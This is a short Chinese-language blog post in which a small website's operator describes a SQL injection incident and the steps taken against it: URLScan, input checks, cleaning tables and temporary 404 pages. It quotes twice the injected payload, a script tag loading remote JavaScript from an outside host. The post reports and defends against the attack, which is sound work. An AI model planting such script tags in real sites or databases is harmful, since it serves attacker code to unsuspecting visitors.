close
不知道是樹大招風還是怎麼了
明明三助網的流量也不是很大… 怎麼會中獎了捏!
有不少欄位被灌入<script src=http://3b3.org/c.js> </script>
不然就是被莫名奇妙的加了一、二張資料表
三助網不過就是辦個抽獎活動而已嘛…
怎麼就……… 唉唉
但是…說真的,本網站大概真有不少大大小小的漏洞吧!
雖然現在裝了URLSCAN,也在各個TEXTBOX加上判斷
針對目前所有有問題的資料表進行醫治
可是目前還是有不少網頁會有問題
也只能先靠 ERROR 404 先蓋起來了…
希望可以順利渡過這一次的難關
各位朋友呀~ 請多加小心留意… >"<
參考資料:
解决" < src=http://3b3.org/c.js> </script> "SQL注入方法
游擊式的SQL Injection攻擊
IIS 安全性延伸模組 URLScan 3 進階應用 - 自訂規則清單
<script src=http://3b3.org/c.js> </script> 攻擊
全站熱搜
留言列表
心情霓虹燈 (9)